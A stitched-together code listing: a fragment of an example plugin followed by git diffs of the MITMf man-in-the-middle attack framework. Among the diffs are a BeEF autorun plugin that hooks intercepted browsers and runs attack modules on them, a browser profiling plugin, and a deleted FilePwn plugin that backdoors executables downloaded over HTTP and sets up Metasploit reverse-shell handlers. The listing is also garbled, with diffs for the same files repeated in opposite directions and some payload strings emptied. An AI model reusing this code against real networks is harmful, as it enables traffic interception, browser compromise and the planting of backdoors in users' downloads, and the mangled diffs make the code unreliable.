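        # watch ./config for modifications (mitmf.py performs this call for
        # every loaded plugin that defines startConfigWatch)
        self.startConfigWatch()

    def onConfigChange(self):
        # invoked by ConfigWatcher after config/mitmf.conf has been reloaded
        self.dns_port = int(self.config['MITMf']['DNS']['port'])

if __name__ == '__main__':
    p = ExamplePlugin()
    p.initialize('eth0')   # hypothetical interface name

mitmf.py drives the same flow for real plugins: it calls startConfigWatch() on every loaded plugin that defines it, and watchdog then triggers on_modified() -> reloadConfig() -> onConfigChange() whenever a file under ./config changes.
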
-mitmf_version = "0.9.6" +mitmf_version = "0.9.6-dev" sslstrip_version = "0.9" sergio_version = "0.2.1" dnschef_version = "0.4" @@ -75,6 +70,8 @@ sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a l sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") #Initialize plugins +plugin_classes = plugin.Plugin.__subclasses__() + plugins = [] try: for p in plugin_classes: @@ -99,37 +96,6 @@ except NotImplementedError: args = parser.parse_args() -try: - configfile = ConfigObj(args.configfile) -except Exception, e: - sys.exit("[-] Error parsing config file: {}".format(e)) - -config_args = configfile['MITMf']['args'] -if config_args: - print "[*] Loading arguments from config file" - for arg in config_args.split(' '): - sys.argv.append(arg) - args = parser.parse_args() - -#################################################################################################### - -# Here we check for some variables that are very commonly used, and pass them down to the plugins -try: - args.ip_address = get_if_addr(args.interface) - if (args.ip_address == "0.0.0.0") or (args.ip_address is None): - sys.exit("[-] Interface {} does not have an assigned IP address".format(args.interface)) -except Exception, e: - sys.exit("[-] Error retrieving interface IP address: {}".format(e)) - -try: - args.mac_address = get_if_hwaddr(args.interface) -except Exception, e: - sys.exit("[-] Error retrieving interface MAC address: {}".format(e)) - -args.configfile = configfile #so we can pass the configobj down to all the plugins - -#################################################################################################### - log_level = logging.__dict__[args.log_level.upper()] #Start logging @@ -158,11 +124,9 @@ for p in plugins: print "| |_ {}".format(line) p.tree_output.remove(line) - if getattr(args, p.optname): p.initialize(args) load.append(p) - if vars(args)[p.optname] is True: if hasattr(p, 'tree_output') and p.tree_output: for line in p.tree_output: print "| |_ {}".format(line) @@ -170,21 +134,15 @@ for p in plugins: #Plugins are ready to go, start MITMf if args.disproxy: ProxyPlugins.getInstance().setPlugins(load) + DNSChef.getInstance().start() else: - from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor - from libs.dnschef.dnschef import DNSChef + from core.dnschef.dnschef import DNSChef URLMonitor.getInstance().setFaviconSpoofing(args.favicon) - URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver']) - URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port']) - DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS']) - if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on': - DNSChef.getInstance().startTCP() - else: - DNSChef.getInstance().startUDP() + DNSChef.getInstance().start() CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) @@ -195,10 +153,12 @@ else: reactor.listenTCP(args.listen, strippingFactory) #load custom reactor options for plugins that have the 'plugin_reactor' attribute - for p in plugins: - if getattr(args, p.optname): - if hasattr(p, 'plugin_reactor'): - p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it + for p in load: + if hasattr(p, 'plugin_reactor'): + p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it + + if hasattr(p, 'startConfigWatch'): + 
p.startConfigWatch() print "|" print "|_ Sergio-Proxy v{} online".format(sergio_version) diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py index 13985a1..8d81dc8 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -29,6 +29,7 @@ import sys from plugins.plugin import Plugin from datetime import date from core.sslstrip.URLMonitor import URLMonitor +from core.configwatcher import ConfigWatcher mitmf_logger = logging.getLogger('mitmf') @@ -47,18 +48,16 @@ class AppCachePlugin(Plugin): self.urlMonitor.setAppCachePoisoning() - try: - self.config = options.configfile['AppCachePoison'] - except Exception, e: - sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e)) - def handleResponse(self, request, data): + self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request url = request.client.uri req_headers = request.client.getAllHeaders() headers = request.client.responseHeaders ip = request.client.getClientIP() + ######################################################################### + if "enable_only_in_useragents" in self.config: regexp = self.config["enable_only_in_useragents"] if regexp and not re.search(regexp,req_headers["user-agent"]): diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 59fceeb..39bed82 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -24,16 +24,15 @@ import json import threading from core.beefapi.beefapi import BeefAPI +from core.configwatcher import ConfigWatcher +from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.Inject import Inject from time import sleep -requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message -requests_log.setLevel(logging.WARNING) - mitmf_logger = logging.getLogger('mitmf') -class BeefAutorun(Inject, Plugin): +class BeefAutorun(Inject, Plugin, ConfigWatcher): name = "BeEFAutorun" optname = "beefauto" desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" @@ -43,95 +42,90 @@ class BeefAutorun(Inject, Plugin): has_opts = False def initialize(self, options): - self.options = options - self.ip_address = options.ip_address - - try: - beefconfig = options.configfile['MITMf']['BeEF'] - except Exception, e: - sys.exit("[-] Error parsing BeEF options in config file: " + str(e)) - - try: - userconfig = options.configfile['BeEFAutorun'] - except Exception, e: - sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e)) - - self.Mode = userconfig['mode'] - self.All_modules = userconfig["ALL"] - self.Targeted_modules = userconfig["targets"] + self.options = options + self.ip_address = SystemConfig.getIP(options.interface) Inject.initialize(self, options) - self.black_ips = [] - self.html_payload = '' % (self.ip_address, beefconfig['beefport']) - - beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) - if not beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") - self.tree_output.append("Mode: %s" % self.Mode) + self.onConfigChange() - t = threading.Thread(name="autorun", target=self.autorun, args=(beef,)) + t = threading.Thread(name="autorun", target=self.autorun, args=()) t.setDaemon(True) t.start() - def autorun(self, beef): + def onConfigChange(self): + + beefconfig = self.config['MITMf']['BeEF'] + + self.html_payload = ''.format(self.ip_address, beefconfig['beefport']) + + self.beef = BeefAPI({"host": beefconfig['beefip'], "port": 
beefconfig['beefport']}) + if not self.beef.login(beefconfig['user'], beefconfig['pass']): + sys.exit("[-] Error logging in to BeEF!") + + self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) + + def autorun(self): already_ran = [] already_hooked = [] while True: - sessions = beef.sessions_online() + mode = self.config['BeEFAutorun']['mode'] + sessions = self.beef.sessions_online() if (sessions is not None and len(sessions) > 0): for session in sessions: if session not in already_hooked: - info = beef.hook_info(session) - mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os'])) + info = self.beef.hook_info(session) + mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) already_hooked.append(session) self.black_ips.append(str(info['ip'])) - if self.Mode == 'oneshot': + if mode == 'oneshot': if session not in already_ran: - self.execModules(session, beef) + self.execModules(session) already_ran.append(session) - elif self.Mode == 'loop': - self.execModules(session, beef) + elif mode == 'loop': + self.execModules(session) sleep(10) else: sleep(1) - def execModules(self, session, beef): - session_info = beef.hook_info(session) - session_ip = session_info['ip'] - hook_browser = session_info['name'] - hook_os = session_info['os'] + def execModules(self, session): + session_info = self.beef.hook_info(session) + session_ip = session_info['ip'] + hook_browser = session_info['name'] + hook_os = session_info['os'] + all_modules = self.config['BeEFAutorun']["ALL"] + targeted_modules = self.config['BeEFAutorun']["targets"] - if len(self.All_modules) > 0: - mitmf_logger.info("%s >> sending generic modules" % session_ip) - for module, options in self.All_modules.iteritems(): - mod_id = beef.module_id(module) - resp = beef.module_run(session, mod_id, json.loads(options)) + if len(all_modules) > 0: + mitmf_logger.info("{} >> sending generic modules".format(session_ip)) + for module, options in all_modules.iteritems(): + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) if resp["success"] == 'true': - mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) else: - mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) sleep(0.5) - mitmf_logger.info("%s >> sending targeted modules" % session_ip) - for os in self.Targeted_modules: + mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) + for os in targeted_modules: if (os in hook_os) or (os == hook_os): - browsers = self.Targeted_modules[os] + browsers = targeted_modules[os] if len(browsers) > 0: for browser in browsers: if browser == hook_browser: - modules = self.Targeted_modules[os][browser] + modules = targeted_modules[os][browser] if len(modules) > 0: for module, options in modules.iteritems(): - mod_id = beef.module_id(module) - resp = beef.module_run(session, mod_id, json.loads(options)) + mod_id = self.beef.module_id(module) + resp = self.beef.module_run(session, mod_id, json.loads(options)) if resp["success"] == 'true': - mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) else: - mitmf_logger.info('%s >> ERROR sending 
module %s' % (session_ip, mod_id)) + mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 8f3afa1..44ea3c5 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -54,7 +54,7 @@ class BrowserProfiler(Inject, Plugin): if self.dic_output['plugin_list'] > 0: self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') pretty_output = pformat(self.dic_output) - mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output)) + mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) def get_payload(self): payload = """'.format(self.ip_address, beefconfig['beefport']) - - self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) - if not self.beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") - - self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) - - def autorun(self): - already_ran = [] - already_hooked = [] - - while True: - mode = self.config['BeEFAutorun']['mode'] - sessions = self.beef.sessions_online() - if (sessions is not None and len(sessions) > 0): - for session in sessions: - - if session not in already_hooked: - info = self.beef.hook_info(session) - mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) - already_hooked.append(session) - self.black_ips.append(str(info['ip'])) - - if mode == 'oneshot': - if session not in already_ran: - self.execModules(session) - already_ran.append(session) - - elif mode == 'loop': - self.execModules(session) - sleep(10) - - else: - sleep(1) - - def execModules(self, session): - session_info = self.beef.hook_info(session) - session_ip = session_info['ip'] - hook_browser = session_info['name'] - hook_os = session_info['os'] - all_modules = self.config['BeEFAutorun']["ALL"] - targeted_modules = self.config['BeEFAutorun']["targets"] - - if len(all_modules) > 0: - mitmf_logger.info("{} >> sending generic modules".format(session_ip)) - for module, options in all_modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) - - mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) - for os in targeted_modules: - if (os in hook_os) or (os == hook_os): - browsers = targeted_modules[os] - if len(browsers) > 0: - for browser in browsers: - if browser == hook_browser: - modules = targeted_modules[os][browser] - if len(modules) > 0: - for module, options in modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py deleted file mode 100644 index 44ea3c5..0000000 --- a/plugins/BrowserProfiler.py +++ /dev/null @@ -1,129 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free 
software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -from pprint import pformat -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class BrowserProfiler(Inject, Plugin): - name = "Browser Profiler" - optname = "browserprofiler" - desc = "Attempts to enumerate all browser plugins of connected clients" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.get_payload() - self.dic_output = {} # so other plugins can access the results - - def post2dict(self, post): #converts the ajax post to a dic - dict = {} - for line in post.split('&'): - t = line.split('=') - dict[t[0]] = t[1] - return dict - - def sendPostData(self, request): - #Handle the plugin output - if 'clientprfl' in request.uri: - self.dic_output = self.post2dict(request.postData) - self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client - if self.dic_output['plugin_list'] > 0: - self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') - pretty_output = pformat(self.dic_output) - mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) - - def get_payload(self): - payload = """""" - - return payload diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py index b912244..c039f61 100644 --- a/plugins/CacheKill.py +++ b/plugins/CacheKill.py @@ -20,7 +20,6 @@ from plugins.plugin import Plugin - class CacheKill(Plugin): name = "CacheKill" optname = "cachekill" diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py deleted file mode 100644 index ebe6fbc..0000000 --- a/plugins/FilePwn.py +++ /dev/null @@ -1,652 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' -# -# Author Joshua Pitts the.midnite.runr 'at' gmail com -# -# Copyright (c) 2013-2014, Joshua Pitts -# All rights reserved. 
-# -# Redistribution and use in source and binary forms, with or without modification, -# are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# 3. Neither the name of the copyright holder nor the names of its contributors -# may be used to endorse or promote products derived from this software without -# specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -# -# Tested on Kali-Linux. - -import sys -import os -import pefile -import zipfile -import logging -import shutil -import random -import string -import tarfile -import multiprocessing -import threading - -from libs.bdfactory import pebin -from libs.bdfactory import elfbin -from libs.bdfactory import machobin -from core.msfrpc import Msfrpc -from core.configwatcher import ConfigWatcher -from plugins.plugin import Plugin -from tempfile import mkstemp -from configobj import ConfigObj - -mitmf_logger = logging.getLogger('mitmf') - -class FilePwn(Plugin, ConfigWatcher): - name = "FilePwn" - optname = "filepwn" - desc = "Backdoor executables being sent over http using bdfactory" - implements = ["handleResponse"] - tree_output = ["BDFProxy v0.3.2 online"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - - self.patched = multiprocessing.Queue() - - #FOR FUTURE USE - self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] - - #FOR FUTURE USE - self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] - - #USED NOW - self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, - 'pe': {'number': 'MZ', 'offset': 0}, - 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, - 'bz': {'number': 'BZ', 'offset': 0}, - 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, - 'tar': {'number': 'ustar', 'offset': 257}, - 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, - 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, - 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, - } - - #NOT USED NOW - #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) - - #FilePwn options - self.userConfig = self.config['FilePwn'] - self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] - self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] - 
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] - self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] - self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] - self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] - self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] - self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] - self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] - self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] - self.zipblacklist = self.userConfig['ZIP']['blacklist'] - self.tarblacklist = self.userConfig['TAR']['blacklist'] - - #Metasploit options - msfcfg = self.config['MITMf']['Metasploit'] - rpcip = msfcfg['rpcip'] - rpcpass = msfcfg['rpcpass'] - - try: - msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary - msf.login('msf', rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - self.tree_output.append("Setting up Metasploit payload handlers") - jobs = msf.call('job.list') - for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: - cmd = "use exploit/multi/handler\n" - cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) - cmd += "set LHOST {}\n".format(config["HOST"]) - cmd += "set LPORT {}\n".format(config["PORT"]) - cmd += "exploit -j\n" - - if jobs: - for pid, name in jobs.iteritems(): - info = msf.call('job.info', [pid]) - if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - else: - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - - def onConfigChange(self): - self.initialize(self.options) - - def convert_to_Bool(self, aString): - if aString.lower() == 'true': - return True - elif aString.lower() == 'false': - return False - elif aString.lower() == 'none': - return None - - def bytes_have_format(self, bytess, formatt): - number = self.magicNumbers[formatt] - if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: - return True - return False - - def binaryGrinder(self, binaryFile): - """ - Feed potential binaries into this function, - it will return the result PatchedBinary, False, or None - """ - - with open(binaryFile, 'r+b') as f: - binaryTMPHandle = f.read() - - binaryHeader = binaryTMPHandle[:4] - result = None - - try: - if binaryHeader[:2] == 'MZ': # PE/COFF - pe = pefile.PE(data=binaryTMPHandle, fast_load=True) - magic = pe.OPTIONAL_HEADER.Magic - machineType = pe.FILE_HEADER.Machine - - #update when supporting more than one arch - if (magic == int('20B', 16) and machineType == 0x8664 and - self.WindowsType.lower() in ['all', 'x64']): - add_section = False - cave_jumping = False - if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - 
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx64['SHELL'], - HOST=self.WindowsIntelx64['HOST'], - PORT=int(self.WindowsIntelx64['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif (machineType == 0x14c and - self.WindowsType.lower() in ['all', 'x86']): - add_section = False - cave_jumping = False - #add_section wins for cave_jumping - #default is single for BDF - if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx86['SHELL'], - HOST=self.WindowsIntelx86['HOST'], - PORT=int(self.WindowsIntelx86['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF - - targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - if targetFile.class_type == 0x1: - #x86CPU Type - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx86['SHELL'], - HOST=self.LinuxIntelx86['HOST'], - PORT=int(self.LinuxIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - elif targetFile.class_type == 0x2: - #x64 - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx64['SHELL'], - HOST=self.LinuxIntelx64['HOST'], - PORT=int(self.LinuxIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho - targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE - - if targetFile.FAT_FILE is True: - if self.FatPriority == 'x86': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif self.FatPriority == 'x64': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - 
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - self.patched.put(result) - return - - except Exception as e: - print 'Exception', str(e) - mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) - return None - - def tar_files(self, aTarFileBytes, formatt): - "When called will unpack and edit a Tar File and return a tar file" - - print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' - - if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): - print "[!] TarFile over allowed size" - mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes))) - self.patched.put(aTarFileBytes) - return - - with tempfile.NamedTemporaryFile() as tarFileStorage: - tarFileStorage.write(aTarFileBytes) - tarFileStorage.flush() - - if not tarfile.is_tarfile(tarFileStorage.name): - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - compressionMode = ':' - if formatt == 'gz': - compressionMode = ':gz' - if formatt == 'bz': - compressionMode = ':bz2' - - tarFile = None - try: - tarFileStorage.seek(0) - tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode) - except tarfile.ReadError: - pass - - if tarFile is None: - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - print '[*] Tar file contents and info:' - print '[*] Compression:', formatt - - members = tarFile.getmembers() - for info in members: - print "\t", info.name, info.mtime, info.size - - newTarFileStorage = tempfile.NamedTemporaryFile() - newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage) - - patchCount = 0 - wasPatched = False - - for info in members: - print "[*] >>> Next file in tarfile:", info.name - - if not info.isfile(): - print info.name, 'is not a file' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - if info.size >= long(self.FileSizeMax): - print info.name, 'is too big' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - # Check against keywords - keywordCheck = False - - if type(self.tarblacklist) is str: - if self.tarblacklist.lower() in info.name.lower(): - keywordCheck = True - - else: - for keyword in self.tarblacklist: - if keyword.lower() in info.name.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Tar blacklist enforced!" 
